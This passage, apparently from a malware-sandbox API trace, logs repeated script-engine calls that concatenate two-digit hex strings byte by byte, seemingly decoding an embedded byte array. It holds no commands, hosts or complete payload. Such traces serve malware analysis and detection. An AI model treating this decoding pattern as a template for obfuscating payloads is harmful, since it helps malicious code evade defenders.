0x0 [0102.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.594] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.594] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.594] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.594] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.594] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.594] VarBstrCat (in: bstrLeft="&H4", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.594] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.595] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.595] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.595] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.595] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.595] VarBstrCat (in: bstrLeft="&Hc", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.595] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.596] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.596] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.596] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.596] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.596] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.596] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.596] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.597] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.597] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.597] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.597] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.597] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.597] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.597] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.598] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.598] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.598] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.598] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.598] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.598] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.599] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.599] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.599] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.599] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.599] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.599] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.599] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.599] VarBstrCat (in: bstrLeft="&Hc", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.599] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.599] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.600] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.600] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.600] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.600] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.600] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.600] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.600] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.600] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.600] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.601] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.601] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.601] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.601] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.601] VarBstrCat (in: bstrLeft="&H8", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.601] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.601] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.601] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.601] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.602] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.602] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.602] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.602] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.602] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.602] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.602] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.602] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.603] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.603] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.603] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.603] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.603] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.603] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.603] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.603] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.603] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.603] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.603] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.604] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.604] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.604] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.604] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.604] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.604] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.604] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.604] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.604] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.604] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.605] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.605] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.605] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.605] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.605] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.605] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.605] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.605] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.605] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.606] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.606] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.606] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.606] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.606] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.606] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.606] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.606] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.606] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.606] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.606] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.607] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.607] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.607] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.607] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.607] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.607] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.607] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.607] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.607] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.607] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.607] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.607] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.608] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.608] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.608] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.608] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.608] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.608] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.608] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.608] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.608] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.608] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.609] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.609] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.609] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.609] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.609] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.609] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.609] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.609] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.609] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.609] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.609] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.610] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.610] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.610] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.610] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.610] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.610] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.610] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.718] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.718] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.718] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.718] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.719] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.719] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.719] VarBstrCat (in: bstrLeft="&Hd", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.719] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.719] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 